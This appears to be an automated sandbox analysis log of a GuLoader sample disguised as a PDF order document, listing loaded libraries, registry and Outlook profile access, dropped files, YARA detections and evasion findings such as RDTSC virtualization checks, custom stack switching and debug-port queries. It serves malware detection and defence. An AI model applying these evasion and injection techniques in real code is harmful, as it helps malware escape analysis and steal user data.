            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeFile written: C:\Windows\Resources\0809\mysterist.iniJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: sdchange.pdbGCTL source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2936496818.0000000000728000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cXGDMXIloFhOE.exe, 00000006.00000002.2936926532.0000000000EEE000.00000002.00000001.01000000.0000000A.sdmp, cXGDMXIloFhOE.exe, 00000008.00000000.2687039028.0000000000EEE000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032B57000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.00000000329A4000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.0000000004710000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2611022611.000000000455B000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2608657007.00000000043AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032B57000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.00000000329A4000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.0000000004710000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2611022611.000000000455B000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2608657007.00000000043AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp
            Source: Binary string: sdchange.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2936496818.0000000000728000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000000.00000002.2279952126.0000000004C51000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_6FBC1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FBC1B63
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_6FBC2FD0 push eax; ret 0_2_6FBC2FFE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D309AD push ecx; mov dword ptr [esp], ecx4_2_32D309B6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeAPI/Special instruction interceptor: Address: 51EB1B2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeAPI/Special instruction interceptor: Address: 1DDB1B2
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeRDTSC instruction interceptor: First address: 51AAF3C second address: 51AAF3C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F1BB0BB00A8h 0x00000006 test cl, bl 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeRDTSC instruction interceptor: First address: 1D9AF3C second address: 1D9AF3C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F1BB0FCA728h 0x00000006 test cl, bl 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5BBA0 rdtsc 4_2_32D5BBA0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeAPI coverage: 0.3 %
            Source: C:\Windows\SysWOW64\sdchange.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603801719.0000000002D6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603885023.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504531613.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504308174.0000000002DA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: sdchange.exe, 00000007.00000002.2936326745.0000000000896000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2936943010.000000000062F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2917594405.0000024A0302C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4984
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4976
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5BBA0 rdtsc 4_2_32D5BBA0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D735C0 NtCreateMutant,LdrInitializeThunk,4_2_32D735C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_6FBC1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FBC1B63
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B2D3 mov eax, dword ptr fs:[00000030h]4_2_32D2B2D3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B2D3 mov eax, dword ptr fs:[00000030h]4_2_32D2B2D3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B2D3 mov eax, dword ptr fs:[00000030h]4_2_32D2B2D3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E052E2 mov eax, dword ptr fs:[00000030h]4_2_32E052E2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5F2D0 mov eax, dword ptr fs:[00000030h]4_2_32D5F2D0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5F2D0 mov eax, dword ptr fs:[00000030h]4_2_32D5F2D0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3A2C3 mov eax, dword ptr fs:[00000030h]4_2_32D3A2C3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3A2C3 mov eax, dword ptr fs:[00000030h]4_2_32D3A2C3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3A2C3 mov eax, dword ptr fs:[00000030h]4_2_32D3A2C3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3A2C3 mov eax, dword ptr fs:[00000030h]4_2_32D3A2C3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3A2C3 mov eax, dword ptr fs:[00000030h]4_2_32D3A2C3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h]4_2_32D5B2C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h]4_2_32D5B2C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h]4_2_32D5B2C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h]4_2_32D5B2C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h]4_2_32D5B2C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h]4_2_32D5B2C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h]4_2_32D5B2C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D392C5 mov eax, dword ptr fs:[00000030h]4_2_32D392C5
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D392C5 mov eax, dword ptr fs:[00000030h]4_2_32D392C5
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEF2F8 mov eax, dword ptr fs:[00000030h]4_2_32DEF2F8
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D292FF mov eax, dword ptr fs:[00000030h]4_2_32D292FF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h]4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D402E1 mov eax, dword ptr fs:[00000030h]4_2_32D402E1
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D402E1 mov eax, dword ptr fs:[00000030h]4_2_32D402E1
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D402E1 mov eax, dword ptr fs:[00000030h]4_2_32D402E1
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6329E mov eax, dword ptr fs:[00000030h]4_2_32D6329E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6329E mov eax, dword ptr fs:[00000030h]4_2_32D6329E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6E284 mov eax, dword ptr fs:[00000030h]4_2_32D6E284
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6E284 mov eax, dword ptr fs:[00000030h]4_2_32D6E284
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB0283 mov eax, dword ptr fs:[00000030h]4_2_32DB0283
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB0283 mov eax, dword ptr fs:[00000030h]4_2_32DB0283
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB0283 mov eax, dword ptr fs:[00000030h]4_2_32DB0283
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E05283 mov eax, dword ptr fs:[00000030h]4_2_32E05283
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB92BC mov eax, dword ptr fs:[00000030h]4_2_32DB92BC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB92BC mov eax, dword ptr fs:[00000030h]4_2_32DB92BC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB92BC mov ecx, dword ptr fs:[00000030h]4_2_32DB92BC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB92BC mov ecx, dword ptr fs:[00000030h]4_2_32DB92BC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D402A0 mov eax, dword ptr fs:[00000030h]4_2_32D402A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D402A0 mov eax, dword ptr fs:[00000030h]4_2_32D402A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D452A0 mov eax, dword ptr fs:[00000030h]4_2_32D452A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D452A0 mov eax, dword ptr fs:[00000030h]4_2_32D452A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D452A0 mov eax, dword ptr fs:[00000030h]4_2_32D452A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D452A0 mov eax, dword ptr fs:[00000030h]4_2_32D452A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF92A6 mov eax, dword ptr fs:[00000030h]4_2_32DF92A6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF92A6 mov eax, dword ptr fs:[00000030h]4_2_32DF92A6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF92A6 mov eax, dword ptr fs:[00000030h]4_2_32DF92A6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF92A6 mov eax, dword ptr fs:[00000030h]4_2_32DF92A6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC62A0 mov eax, dword ptr fs:[00000030h]4_2_32DC62A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC62A0 mov ecx, dword ptr fs:[00000030h]4_2_32DC62A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC62A0 mov eax, dword ptr fs:[00000030h]4_2_32DC62A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC62A0 mov eax, dword ptr fs:[00000030h]4_2_32DC62A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC62A0 mov eax, dword ptr fs:[00000030h]4_2_32DC62A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC62A0 mov eax, dword ptr fs:[00000030h]4_2_32DC62A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC72A0 mov eax, dword ptr fs:[00000030h]4_2_32DC72A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC72A0 mov eax, dword ptr fs:[00000030h]4_2_32DC72A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2A250 mov eax, dword ptr fs:[00000030h]4_2_32D2A250
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEB256 mov eax, dword ptr fs:[00000030h]4_2_32DEB256
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEB256 mov eax, dword ptr fs:[00000030h]4_2_32DEB256
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D36259 mov eax, dword ptr fs:[00000030h]4_2_32D36259
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29240 mov eax, dword ptr fs:[00000030h]4_2_32D29240
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29240 mov eax, dword ptr fs:[00000030h]4_2_32D29240
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6724D mov eax, dword ptr fs:[00000030h]4_2_32D6724D
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D59274 mov eax, dword ptr fs:[00000030h]4_2_32D59274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D71270 mov eax, dword ptr fs:[00000030h]4_2_32D71270
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D71270 mov eax, dword ptr fs:[00000030h]4_2_32D71270
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h]4_2_32DE0274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h]4_2_32DE0274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h]4_2_32DE0274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h]4_2_32DE0274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h]4_2_32DE0274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h]4_2_32DE0274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h]4_2_32DE0274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h]4_2_32DE0274
